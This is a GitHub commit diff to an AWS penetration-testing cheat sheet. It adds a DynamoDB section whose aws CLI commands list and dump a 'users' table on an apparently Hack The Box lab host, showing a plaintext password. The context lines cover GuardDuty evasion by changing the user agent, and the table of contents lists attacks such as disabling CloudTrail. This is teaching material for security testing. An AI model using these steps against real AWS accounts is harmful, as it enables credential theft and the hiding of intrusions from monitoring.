Merge pull request #361 from sokaRepo/master

Add AWS DynamoDB enumeration
This commit is contained in:
Swissky 2021-04-30 22:21:28 +02:00 committed by GitHub
commit 28a48bd696
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -4,29 +4,31 @@
## Summary
* [Training](#training)
* [Tools](#tools)
* [AWS - Patterns](#aws---patterns)
* [AWS - Metadata SSRF](#aws---metadata-ssrf)
* [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
* [Method for Container Service (Fargate)](#method-for-container-service-fargate)
* [AWS API calls that return credentials](#aws-api-calls-that-return-credentials)
* [AWS - Shadow Admin](#aws---shadow-admin)
* [Admin equivalent permission](#admin-equivalent-permission)
* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
* [PenTest:IAMUser/KaliLinux](#)
* [PenTest:IAMUser/ParrotLinux](#)
* [PenTest:IAMUser/PentooLinux](#)
* [Security checks](#security-checks)
* [References](#references)
- [AWS](#aws)
- [Summary](#summary)
- [Training](#training)
- [Tools](#tools)
- [AWS Patterns](#aws-patterns)
- [AWS - Metadata SSRF](#aws---metadata-ssrf)
- [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
- [Method for Container Service (Fargate)](#method-for-container-service-fargate)
- [AWS API calls that return credentials](#aws-api-calls-that-return-credentials)
- [AWS - Shadow Admin](#aws---shadow-admin)
- [Admin equivalent permission](#admin-equivalent-permission)
- [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
- [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions)
- [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
- [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
- [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
- [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
- [AWS - SSM - Command execution](#aws---ssm---command-execution)
- [AWS - Golden SAML Attack](#aws---golden-saml-attack)
- [AWS - Shadow Copy attack](#aws---shadow-copy-attack)
- [Disable CloudTrail](#disable-cloudtrail)
- [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
- [DynamoDB](#dynamodb)
- [Security checks](#security-checks)
- [References](#references)
## Training
@ -605,6 +607,34 @@ if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): #
self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
```
## DynamoDB
> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second.
* list tables
```bash
$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
{
"TableNames": [
"users"
]
}
```
* enumerate table content
```bash
$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
```
## Security checks
https://github.com/DenizParlak/Zeus